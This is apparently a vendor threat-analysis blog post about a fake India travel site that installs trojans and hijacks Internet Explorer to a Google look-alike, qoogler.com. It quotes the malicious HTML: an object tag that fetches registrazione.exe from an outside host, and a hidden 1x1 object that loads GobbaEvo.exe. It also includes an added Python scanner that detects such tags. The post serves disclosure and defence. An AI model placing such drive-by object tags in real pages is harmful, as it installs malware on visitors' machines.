Feb 1
11:28 am (UTC-7)   |   by Loucif Kharouni (Threats Analyst)

Yesterday we received reports of a malicious Web site that targets Italian users. This particular site purports to be a tour and travel operator for India:

The malicious source is similar to:

<object classid="clsid:0F5FBC88-CC6A-48e8-B037-E37763D0482B" codebase="http://www.{BLOCKED}elettronici.com/indiatouroperator/registrazione.exe">
</object>

The file registrazione.exe is detected as TROJ_AGENT.AAFY, and the URL that it hosts is detected as HTML_AGENT.AAFX.

Once the file “Registrazione” is installed on a system, it automatically redirects to a horoscope Web site, which in fact has nothing to do with Travel Tour Operator:

Note that the file registrazione.exe (TROJ_AGENT.AAFY) downloads other malware components, such as TROJ_AGENT.ZTH.

After the download and installation are completed, the browser indicates that an error occurred while loading the “desired” Web site. The easiest and fastest way to continue when Internet Explorer (IE) crashes is to open a new browser window — but upon doing so, the user will find that the IE start page now points to a new Web site, www.qoogler.com, which poses as the legitimate Google Web site:

This is not a typographical error on our part: it is indeed “qoogler.com” posing as the Google search engine. Take a closer look at the page and note that Google has become “GOOOGLE”. It also has an “AstroGooogle” link, which sends the user back to the astrology Web site mentioned above. This is another social engineering technique the malware employs to fool users into downloading its components.

Here’s the HTML code for the malicious page:

</HEAD> <object classid="CLSID:0D95404C-C067-4ecf-BB6D-AB6008717183" codebase="GobbaEvo.exe" width="1" height="1"> </object><BODY text=#000000 vLink=#551a8b aLink=#ff0000 link=#0000cc bgColor=#ffffff>

<CENTER> <br> <IMG height=74 alt=Google src="images/nav_logo.gif" width=226><BR> <BR> <form name="form1" method="post" action="./index.asp"> <TABLE cellSpacing=0 cellPadding=4 border=0> <TBODY>
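Both fragments above rely on the same delivery trick: an <object> tag whose codebase attribute hands Internet Explorer an executable to fetch and run, once from another host and once as a bare file name inside a 1x1 object. The scanner below is an added example, not code from the original post or from Trend Micro; a Web proxy or mail gateway could run it over fetched HTML to flag that pattern before the page reaches a browser. The CLSIDs are the ones quoted above; the host names, the page hosts passed in, and the benign comparison control are constructed placeholders (www.blocked-host.invalid stands in for the {BLOCKED} domain).

```python
"""Flag <object> tags whose codebase attribute delivers an executable.

Added example, not part of the original post. Recognises the two patterns
quoted there: a codebase URL pointing straight at an .exe on another host,
and a hidden 1x1 <object> whose codebase is a bare executable name.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# File types IE would run directly from a codebase URL. A signed ActiveX
# control is normally packaged as a .cab, so .cab is deliberately absent:
# a bare executable in codebase is the anomaly worth flagging.
DIRECT_EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".com", ".bat")


class ObjectTagCollector(HTMLParser):
    """Collect the attributes of every <object> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "object":
            # Attribute names are case-insensitive; valueless attributes
            # arrive as None, so normalise them to "".
            self.objects.append({name.lower(): (value or "").strip()
                                 for name, value in attrs})


def classify_object_tags(html, page_host):
    """Return one finding per <object> tag that declares a codebase.

    Each finding carries the classid, the codebase and a list of reason
    codes: "direct-executable", "off-host", "hidden". An empty list means
    nothing stood out for that tag.
    """
    collector = ObjectTagCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs in collector.objects:
        codebase = attrs.get("codebase", "")
        if not codebase:
            continue
        parsed = urlparse(codebase)
        # Legitimate controls append "#version=..." to the codebase; strip
        # the fragment so the suffix test sees only the file name.
        path = parsed.path if parsed.scheme else codebase.split("#", 1)[0]
        reasons = []
        if path.lower().endswith(DIRECT_EXECUTABLE_SUFFIXES):
            reasons.append("direct-executable")
        if parsed.netloc and parsed.netloc.lower() != page_host.lower():
            reasons.append("off-host")
        if attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1"):
            reasons.append("hidden")
        findings.append({"classid": attrs.get("classid", ""),
                         "codebase": codebase,
                         "reasons": reasons})
    return findings


def is_suspicious(finding):
    """A direct executable or an invisible object is enough to alert on;
    an off-host codebase alone is common for legitimate controls."""
    return bool({"direct-executable", "hidden"} & set(finding["reasons"]))


# Constructed samples modelled on the two fragments quoted in the post.
TRAVEL_PAGE = (
    '<object classid="clsid:0F5FBC88-CC6A-48e8-B037-E37763D0482B" '
    'codebase="http://www.blocked-host.invalid/indiatouroperator/registrazione.exe">'
    '</object>'
)
FAKE_SEARCH_PAGE = (
    '</HEAD> <object classid="CLSID:0D95404C-C067-4ecf-BB6D-AB6008717183" '
    'codebase="GobbaEvo.exe" width="1" height="1"> </object>'
    '<BODY text=#000000 bgColor=#ffffff>'
)
# Constructed benign control for comparison: a .cab with a version fragment,
# visible size, placeholder CLSID.
BENIGN_PAGE = (
    '<object classid="clsid:00000000-0000-0000-0000-000000000000" '
    'codebase="http://download.example.invalid/player/player.cab#version=9,0,0,0" '
    'width="400" height="300"></object>'
)

if __name__ == "__main__":
    for label, html, host in (("travel page", TRAVEL_PAGE, "www.tour-site.invalid"),
                              ("fake search page", FAKE_SEARCH_PAGE, "www.qoogler.com"),
                              ("benign page", BENIGN_PAGE, "www.example.invalid")):
        for finding in classify_object_tags(html, host):
            verdict = "SUSPICIOUS" if is_suspicious(finding) else "ok"
            print(f"{label}: {verdict} {finding['codebase']} {finding['reasons']}")
```

The benign sample shows why "off-host" is only informational: plugin installers were routinely served from a vendor's host, so the decisive signals are a codebase that is itself an executable and an object sized so the user never sees it.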

The file GobbaEvo.exe is also detected as TROJ_AGENT.AAFX. In the infection stage, when the user tries to search for “trendmicro” (for example) using Gooogle, he might get the following result:

The search result page asks for installation of a new program to resolve yet another issue with Internet Explorer. The downloaded file is, of course, yet another malware that redirects the user to an adult page, but still under the guise of qoogler.com.




© Copyright 2009 Trend Micro Inc. All rights reserved.